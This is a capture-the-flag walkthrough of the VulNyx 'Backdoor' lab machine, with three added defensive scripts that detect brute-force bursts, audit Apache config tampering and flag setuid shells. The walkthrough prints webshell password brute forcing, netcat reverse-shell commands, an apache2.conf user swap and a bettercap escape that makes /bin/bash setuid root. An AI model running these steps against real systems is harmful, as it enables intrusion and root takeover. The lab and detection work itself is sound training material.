VulNyx - Backdoor
Information
Backdoor is a hard-difficulty vulnerable Linux virtual machine from the VulNyx platform. It was created by the user d4t4s3c and runs correctly on the VirtualBox and VMware hypervisors.

Enumeration
Nmap
TCP
❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.88
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-22 17:29 CET
Nmap scan report for 192.168.1.88
Host is up (0.000090s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
❯ nmap -sVC -p22,80 192.168.1.88
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-22 17:30 CET
Nmap scan report for 192.168.1.88
Host is up (0.00087s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.56 (Debian)
Shell (www-data)
80/TCP (HTTP)
Site

Directory Brute Force
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.88/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.88/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 277]
/Backdoor (Status: 301) [Size: 315] [--> http://192.168.1.88/Backdoor/]
Progress: 220546 / 220547 (100.00%)
===============================================================
Finished
===============================================================
At the /Backdoor path I have no directory listing and it returns a 403 (Forbidden) code

Since the path is called Backdoor, I use a SecLists wordlist specific to backdoors
❯ gobuster dir -w /opt/SecLists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt -u http://192.168.1.88/Backdoor
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.88/Backdoor
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/php-backdoor.php (Status: 200) [Size: 1432]
Progress: 422 / 423 (99.76%)
===============================================================
Finished
===============================================================
In php-backdoor.php I find a webshell that appears to be protected

Password Brute Force
Since no username is available, one can guess that the webshell only takes a single parameter called password or something similar
❯ wfuzz -c -w /opt/techyou.txt -d 'password=FUZZ&cmd=id' -u "http://192.168.1.88/Backdoor/php-backdoor.php" --hh=1432 2>/dev/null
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.1.88/Backdoor/php-backdoor.php
Total requests: 10000
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000004806: 200 64 L 124 W 1486 Ch "newpassword"
Total time: 6.162413
Processed Requests: 10000
Filtered Requests: 9999
Requests/sec.: 1622.740
I get the password newpassword and manage to execute commands as the www-data user
❯ curl -s "http://192.168.1.88/Backdoor/php-backdoor.php" --data "password=newpassword&cmd=id" |tail -n1
uid=33(www-data) gid=33(www-data) groups=33(www-data)
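From the defender's side, the wfuzz run above leaves a very regular trace in Apache's access log: thousands of POSTs from one client to one PHP file, almost all with the same response size (the 1432-byte wrong-password page) and a single outlier for the hit. The following script is an added example, not part of the original writeup; the log lines it reads are constructed for the example and post_bursts is a hypothetical helper name.

```shell
#!/bin/sh
# Added example (not from the writeup): group POST requests in an Apache
# combined-format access log by client and path, and report bursts that
# reach a threshold together with the distinct response sizes seen. A
# password brute force shows up as one client, one path, many POSTs, one
# size repeated thousands of times and one odd size for the correct guess.

# post_bursts LOGFILE THRESHOLD -> lines of "ip path count sizes"
post_bursts() {
    awk -v min="$2" '
        $6 == "\"POST" {
            key = $1 " " $7                 # client IP and request path
            n[key]++
            if (!((key, $10) in seen)) {    # $10 = response size in bytes
                seen[key, $10] = 1
                sep = (key in sizes) ? "," : ""
                sizes[key] = sizes[key] sep $10
            }
        }
        END { for (k in n) if (n[k] >= min) print k, n[k], sizes[k] }
    ' "$1" | sort
}

# Constructed sample log: four guesses against the webshell (one of them the
# correct password, hence the 1486-byte reply) plus unrelated traffic.
LOG=$(mktemp)
cat > "$LOG" <<'EOF'
192.168.1.10 - - [22/Feb/2025:17:40:01 +0100] "GET /Backdoor/php-backdoor.php HTTP/1.1" 200 1432 "-" "Mozilla/5.0"
192.168.1.10 - - [22/Feb/2025:17:40:02 +0100] "POST /Backdoor/php-backdoor.php HTTP/1.1" 200 1432 "-" "Wfuzz/3.1.0"
192.168.1.10 - - [22/Feb/2025:17:40:02 +0100] "POST /Backdoor/php-backdoor.php HTTP/1.1" 200 1432 "-" "Wfuzz/3.1.0"
192.168.1.10 - - [22/Feb/2025:17:40:02 +0100] "POST /Backdoor/php-backdoor.php HTTP/1.1" 200 1486 "-" "Wfuzz/3.1.0"
192.168.1.10 - - [22/Feb/2025:17:40:03 +0100] "POST /Backdoor/php-backdoor.php HTTP/1.1" 200 1432 "-" "Wfuzz/3.1.0"
192.168.1.20 - - [22/Feb/2025:17:41:00 +0100] "POST /contact.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
EOF

post_bursts "$LOG" 3   # prints: 192.168.1.10 /Backdoor/php-backdoor.php 4 1432,1486
```

On a real host the threshold would be far higher than 3; the point is the single client/path pair whose response sizes are one constant plus one outlier.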
Reverse Shell
Now that I can execute commands, I try to obtain a reverse shell
❯ curl -s "http://192.168.1.88/Backdoor/php-backdoor.php" --data "password=newpassword&cmd=nc 192.168.1.10 443 -e /bin/sh"
I obtain the shell as the www-data user
❯ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.10] from (UNKNOWN) [192.168.1.88] 45766
id ; hostname
uid=33(www-data) gid=33(www-data) groups=33(www-data)
backdoor
Shell (rootkit)
Enumeration
Sudo
The www-data user can run the reboot binary as root with sudo
(This only allows rebooting the system)
www-data@backdoor:/$ sudo -l
Matching Defaults entries for www-data on backdoor:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on backdoor:
(root) NOPASSWD: /usr/sbin/reboot
Writable Files
The www-data user has write permission on the /etc/apache2/apache2.conf file
www-data@backdoor:/$ find / -writable -type f 2>/dev/null |grep -vE "proc|sys|var"
/etc/apache2/apache2.conf
Abuse
Given the permissions on the /etc/apache2/apache2.conf file, the user that runs the Apache2 service can be changed from www-data to rootkit, and the system then rebooted with sudo /usr/sbin/reboot so that the change takes effect
www-data@backdoor:/$ echo -en 'User rootkit\nGroup rootkit' >> /etc/apache2/apache2.conf
www-data@backdoor:/$ tail -n2 /etc/apache2/apache2.conf ;echo
User rootkit
Group rootkit
www-data@backdoor:/$ sudo -u root /usr/sbin/reboot
After the system reboots I obtain a shell as the rootkit user
❯ curl -s "http://192.168.1.88/Backdoor/php-backdoor.php" --data "password=newpassword&cmd=nc 192.168.1.10 443 -e /bin/sh"
❯ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.10] from (UNKNOWN) [192.168.1.88] 55786
id ; hostname
uid=1000(rootkit) gid=1000(rootkit) groups=1000(rootkit)
backdoor
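The chain above works because apache2.conf is writable by the service account and because Apache applies the last User/Group directive it parses, so an appended "User rootkit" silently overrides Debian's "User ${APACHE_RUN_USER}". The following audit script is an added example, not part of the original writeup or of the Apache project; effective_directive and audit_apache_conf are hypothetical helper names and the two config files are constructed for the example.

```shell
#!/bin/sh
# Added example (not from the writeup): audit an Apache config for the two
# conditions chained above, a config file writable by more than root and a
# User/Group directive that moves the workers to another account. Only the
# LAST User/Group directive counts, so reading the first match would miss it.

# effective_directive FILE NAME -> value of the last NAME directive in FILE
effective_directive() {
    grep -iE "^[[:space:]]*$2[[:space:]]" "$1" | tail -n1 | awk '{print $2}'
}

# audit_apache_conf FILE SERVICE_USER -> prints findings, returns 1 if any
audit_apache_conf() {
    conf=$1; svc=$2; rc=0
    mode=$(stat -c '%a' "$conf")          # octal mode, e.g. 644 or 666
    case "$mode" in *[2367][0-7]) echo "group-writable (mode $mode)"; rc=1 ;; esac
    case "$mode" in *[2367])      echo "world-writable (mode $mode)"; rc=1 ;; esac
    for d in User Group; do
        v=$(effective_directive "$conf" "$d")
        case "$v" in
            '${APACHE_RUN_'*|"$svc") ;;   # Debian envvars default or the service account
            *) echo "$d resolves to '$v' (expected $svc)"; rc=1 ;;
        esac
    done
    return $rc
}

# Constructed samples: a clean Debian-style config and a tampered copy
DIR=$(mktemp -d)
printf 'ServerRoot "/etc/apache2"\nUser ${APACHE_RUN_USER}\nGroup ${APACHE_RUN_GROUP}\n' > "$DIR/clean.conf"
chmod 644 "$DIR/clean.conf"
cp "$DIR/clean.conf" "$DIR/tampered.conf"
printf 'User rootkit\nGroup rootkit\n' >> "$DIR/tampered.conf"   # the edit from the writeup, replayed
chmod 666 "$DIR/tampered.conf"

for f in clean tampered; do
    echo "== $f.conf"
    audit_apache_conf "$DIR/$f.conf" www-data || echo "-> FINDINGS"
done
```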
Privilege Escalation
Enumeration
Sudo
The rootkit user can run the bettercap binary as root with sudo
rootkit@backdoor:/$ sudo -l
Matching Defaults entries for rootkit on backdoor:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User rootkit may run the following commands on backdoor:
(root) NOPASSWD: /usr/bin/bettercap
Looking through bettercap's help I see something interesting
! COMMAND : Execute a shell command and print its output.
rootkit@backdoor:/$ sudo -u root /usr/bin/bettercap
bettercap v2.32.0 (built for linux amd64 with go1.15.15) [type 'help' for a list of commands]
192.168.1.0/24 > 192.168.1.88 » [18:14:33] [sys.log] [war] Could not find mac for
192.168.1.0/24 > 192.168.1.88 » help
help MODULE : List available commands or show module specific help if no module name is provided.
active : Show information about active modules.
quit : Close the session and exit.
sleep SECONDS : Sleep for the given amount of seconds.
get NAME : Get the value of variable NAME, use * alone for all, or NAME* as a wildcard.
set NAME VALUE : Set the VALUE of variable NAME.
read VARIABLE PROMPT : Show a PROMPT to ask the user for input that will be saved inside VARIABLE.
clear : Clear the screen.
include CAPLET : Load and run this caplet in the current session.
! COMMAND : Execute a shell command and print its output.
alias MAC NAME : Assign an alias to a given endpoint given its MAC address.
Abuse
I set permissions 4755 (SUID) on /bin/bash
rootkit@backdoor:/$ sudo -u root /usr/bin/bettercap
192.168.1.0/24 > 192.168.1.88 » !ls -l /bin/bash
-rwxr-xr-x 1 root root 1234376 Mar 27 2022 /bin/bash
192.168.1.0/24 > 192.168.1.88 » !chmod 4755 /bin/bash
192.168.1.0/24 > 192.168.1.88 » !ls -l /bin/bash
-rwsr-xr-x 1 root root 1234376 Mar 27 2022 /bin/bash
192.168.1.0/24 > 192.168.1.88 » exit
I become the root user
rootkit@backdoor:/$ /bin/bash -pi
bash-5.1# id ; hostname
uid=1000(rootkit) gid=1000(rootkit) euid=0(root) groups=1000(rootkit)
backdoor
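A setuid-root /bin/bash like the one left above is easy to spot if the host keeps a baseline of its setuid files. The script below is an added example, not part of the original writeup; suid_list, suid_new and suid_shells are hypothetical helper names, and the sample tree is constructed in a temp directory so it runs without root (on a real host you would pass / and a baseline recorded at build time).

```shell
#!/bin/sh
# Added example (not from the writeup): compare the setuid files on a
# filesystem with a recorded baseline and flag setuid shells, the classic
# marker of a "chmod 4755 /bin/bash" style persistence.

# suid_list ROOT -> "owner mode path" for every setuid file under ROOT
suid_list() {
    find "$1" -xdev -type f -perm -4000 -printf '%u %m %p\n' 2>/dev/null | sort -k3
}

# suid_new ROOT BASELINE -> setuid paths under ROOT that are absent from BASELINE
suid_new() {
    find "$1" -xdev -type f -perm -4000 -printf '%p\n' 2>/dev/null | sort |
        grep -vxF -f "$2" || true
}

# suid_shells ROOT -> setuid files whose name is an interactive shell
suid_shells() {
    find "$1" -xdev -type f -perm -4000 \
        \( -name bash -o -name sh -o -name dash -o -name zsh -o -name ksh \) \
        2>/dev/null | sort
}

# Constructed sample tree: one legitimately setuid binary (ping) in the
# baseline, then the tampering from the writeup replayed on a dummy bash.
ROOT=$(mktemp -d)
mkdir -p "$ROOT/bin"
for f in bash ping ls; do : > "$ROOT/bin/$f"; chmod 755 "$ROOT/bin/$f"; done
chmod 4755 "$ROOT/bin/ping"
BASELINE="$ROOT/suid.baseline"
suid_list "$ROOT" | awk '{print $NF}' > "$BASELINE"   # snapshot taken before tampering
chmod 4755 "$ROOT/bin/bash"                           # the abuse above, on the sample

echo "new setuid files since baseline:"; suid_new "$ROOT" "$BASELINE"
echo "setuid shells:";                   suid_shells "$ROOT"
```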
Flags
Now as the root user I can read the user.txt and root.txt flags
bash-5.1# find / -name user.txt -o -name root.txt |xargs cat
d9e69***************************
40390***************************
That concludes the resolution of the Backdoor machine.
Happy Hacking!